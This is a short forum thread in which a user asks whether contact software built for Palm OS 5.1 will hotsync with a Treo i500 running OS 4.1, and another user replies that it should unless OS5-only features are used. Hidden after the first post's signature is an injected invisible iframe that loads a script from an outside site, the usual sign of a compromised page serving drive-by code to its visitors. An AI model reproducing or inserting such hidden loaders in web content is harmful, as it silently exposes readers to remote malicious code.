+ Reply to Thread

Question Question about Hotsyncing

Hello all,
    I have a wierd question. My company is looking to buy a few i500s for other partners of the firm (everyone liked mine so much they all wanted their own.) The software that we currently use for contacts and calendaring is being updated (by January) to Hotsync with Palm OS version 5.1. Will this software Hotsync with the i500?

I realize the i500 is version 4.1, but do not know if the new software will work or not. Does the OS make any difference in Hotsyncing? Please help.
    Thanks,
    Brian<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I don't belive so since there is only one version of the Palm Desktop that all Palm OS' use.
    The only thing that will affect this is if the software will use a feature that is only in Palm OS5.

If you notice, your version of Palm Desktop should have a button on the left side that says Note Pad. That is a Palm OS5 feature but your i500 works with that desktop.

So I don't belive you will have anyproblems using the i500 except like i said, you are using a feature that only Palm OS5 has.

-Mike

Thumbs up

Thanks for your help